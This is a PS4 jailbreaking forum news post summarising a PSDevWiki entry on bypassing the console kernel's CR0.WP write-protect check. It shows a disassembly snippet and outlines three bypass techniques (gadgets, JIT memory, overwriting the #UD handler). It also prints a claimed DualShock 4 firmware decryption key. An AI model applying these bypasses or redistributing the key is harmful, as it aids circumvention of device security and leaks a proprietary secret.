Join Us and become a Member for a Verified Badge on Discord to access private areas with the latest PS4 FPKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date Aug 8, 2021 at 4:03 PM       14,623       21      
In PS4Scene news this weekend, recently developer @CelesteBlue (Github / Twitter) detailed a PS4 CR0.WP Protection (Write Protect) Kernel Security Bypass applicable since at least PS4 OFW 6.51 on the PSDevWiki working exploits page. šŸ¤©

This comes proceeding the PS4 Jailbreak 2 updates, latest GoldHEN v1.1 release, PS4 Synacktiv Presentation SSTIC 2021 Recap, PS4 / PS5 SMAP Bypass by m00nbsd and new PS4 Fake PKGs (FPKGs) for those interested.

Below are the technical details for scene devs from PSDevWiki.com, as follows: CR0.WP protection

At least since firmware 6.51 Sony instrumented all instructions that write to the CR0 register with checks for attempts to clear CR0.WP (Write Protect), which is necessary for patching the kernel. This is what it looks like in 6.51 kernel:
Code:
a1b79:       0f 22 c0                mov    cr0,rax
a1b7c:       48 a9 00 00 01 00       test   rax,0x10000
a1b82:       75 02                   jne    a1b86 <-- skip the next instruction if CR0.WP is not cleared
a1b84:       0f 0b                   ud2    <-- #UD exception, causes a kernel panic
a1b86:       c3                      ret
Note that the check is after the write, to prevent a ROP gadget from pointing straight at the mov and skipping the verification.

Bypasses (in chronological order):
  • Use an "unintended" mov to cr0 in the middle of another instruction (e.g. instruction "call $+0x220f1c" (e8 17 0f 22 00) contains an unintended "mov cr0, rax" (0f 22 00))
  • Use kernel write to give your process JIT permissions, allocate JIT memory, and put entirely custom code there (avoids the problem altogether, as it is specific to ROP)
  • Since the IDT is writable on FreeBSD and PS4, it is possible to overwrite an exception handler without clearing CR0.WP first. One can overwrite the handler of #UD with a gadget of their choice (a stack pivot, or a "add rsp, ... ; ret", or whatever else), and the UD2 instruction in the mitigation code will happily jump to it instead of the real handler, with CR0.WP cleared.
Cheers to @HydrogenNGU for passing along this news earlier via Twitter: šŸ»

PS4 Jedi ā€œMASTERā€ Key has been documented by Zecoxao.
Code:
Key: 9B03D4FB5FEC1A2373462C45E4BC72A6
This key decrypts DualShock4 Firmwares. Algorithm is AES-128-CBC. Zeroed IV.
PS4 CR0.WP Protection Kernel Security Bypass Detailed via CelesteBlue.jpg
 

Comments

maoex1

Member
Contributor
Verified
They talk about at least 6.72, not 8.00. by the way i am on 7.55. Stupid, but i dont know that time huge KP issue on 7.55 and almost all games are backported. so i upgrade from 6.72 to 7.55 for nothing, but 10-20 tries to jailbreak and still many kernel panics
 

:fire: Latest Help Topics

Top